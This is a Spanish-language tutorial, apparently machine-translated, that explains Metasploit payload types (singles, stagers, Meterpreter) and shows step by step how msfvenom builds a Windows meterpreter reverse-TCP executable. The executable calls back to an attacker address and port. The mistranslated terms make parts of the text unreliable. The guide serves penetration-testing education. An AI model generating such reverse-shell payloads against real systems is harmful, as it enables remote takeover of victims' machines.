Metasploit es una de las plataformas más utilizadas para realizar pruebas de penetración, piratería e incluso juegos informales. Necesitamos comprender cómo funcionan los componentes y las cargas útiles para usarlos de manera efectiva. En términos simplistas, una carga útil es una acción que debe ejecutarse cuando un exploit ha completado su ejecución. Una carga útil es una parte del código que ejecuta el exploit. Las exploits se utilizan para obtener acceso a un sistema, y las cargas útiles realizan tareas específicas. MetaSploit tiene muchas cargas útiles, como conchas inversas, conchas de enlace, meterpreter y otros. Varias cargas útiles funcionarán con la mayor cantidad de exploits; Sin embargo, encontrar la carga útil adecuada que funcionará con el exploit requiere alguna investigación. Una vez que haya decidido un exploit, use el comando "Mostrar cargas útiles" de MetaSploit para obtener una lista de cargas útiles que funcione con él.
Tipos de cargas útiles
En MetaSploit, hay algunos tipos diferentes de cargas útiles. Estos tres tipos básicos son los que eventualmente terminará usando más:
Individual
Los solteros son extremadamente pequeños y están destinados a iniciar una conversación antes de pasar a otra etapa.
Decisores
La carga útil utiliza el Stager para establecer una conexión de red entre el sistema de destino y el procesador de carga útil del servidor MetaSploit. El stager le permite cargar e insertar una carga útil más grande y complicada denominada etapa utilizando una carga útil más pequeña.
Meterpréter
Meterpreter se ha convertido en una carga útil de ataque de metasploit que da un factor intrusor que afecta cómo navegar y ejecutar código en la máquina de destino. Meterpreter es una aplicación solo de memoria que no escribe en el disco. Meterpreter intentó inyectarse en el proceso atacado, desde donde puede moverse a otros procesos operativos; Por lo tanto, no se generan nuevos procesos. Meterpreter fue creado para evitar las desventajas del uso de cargas útiles especializadas al tiempo que permite la redacción de comandos y la garantía de comunicación encriptada. La desventaja de emplear cargas útiles específicas es que se pueden aumentar las alarmas si se inicia un proceso más nuevo en todo el sistema de destino.
Creación de carga útil con MetaSploit en Kali Linux
Para crear una carga útil con MetaSploit en Kali Linux, siga todos los pasos descritos a continuación:
Paso 1: Acceder a MSFConsole
msfconsole es el único medio para acceder a la mayoría de la funcionalidad de MetaSploit. MSFConsole le da a la plataforma una interfaz basada en la consola. MSFConsole ha sido la interfaz MSF con las mejores características y es la más estable. La capacidad completa de la línea de lectura, las pestañas y la finalización del comando son proporcionadas por MSFConsole. Los comandos externos se pueden ejecutar desde MSFConsole. Use el siguiente comando establecido para acceder a MSFConsole en Kali Linux.
$ msfconsole
Paso 2: Acceder a MSFVENOM
La carga útil que hacemos con MSFVENOM será una carga útil de TCP inversa. Esta carga útil crea un ejecutable que, cuando se inicia, establece una conexión entre la computadora del usuario y nuestro controlador de metasploit, lo que nos permite realizar una sesión de meterpreter. Use el siguiente comando establecido para acceder a MSFVENOM en Kali Linux.
$ msfvenom -p
Paso 3: Creación de carga útil
Use el siguiente comando establecido para crear una carga útil en MetaSploit en Kali Linux.
$ msfvenom -p windows/meterpreter/reverse_tcp lhost = 192.168.43.28 lport = 6001 -f exe -o carga útil.exe
Puede usar la opción -p para indicar qué carga útil desea utilizar. Lhost parece ser la dirección IP del atacante a la que desea que la carga útil sea vinculada. Lport es igual que el anterior; Este es el puerto al que se vinculará la carga útil, y debe configurarse en el controlador. -F instruye a MSFVENOM cómo generar la carga útil; En este caso, vamos a buscar un programa ejecutable o exe. La carga útil creada por la ejecución del comando anterior es 73802 bytes, como se muestra en la imagen atacada anteriormente.
Para verificar dónde se ha creado, navegaremos hacia el directorio de inicio. Desde la captura de pantalla a continuación, puede verificar esa carga útil.exe ha sido creado con éxito.
Puede verificar sus propiedades haciendo doble clic en ella. El tamaño de la carga útil creada es el mismo que se mostró en la pantalla del terminal.
Conclusión
Este artículo ha proporcionado una breve introducción relacionada con las cargas útiles y sus tipos. Hemos seguido instrucciones paso a paso para crear cargas útiles en MetaSploit en el sistema operativo Kali Linux.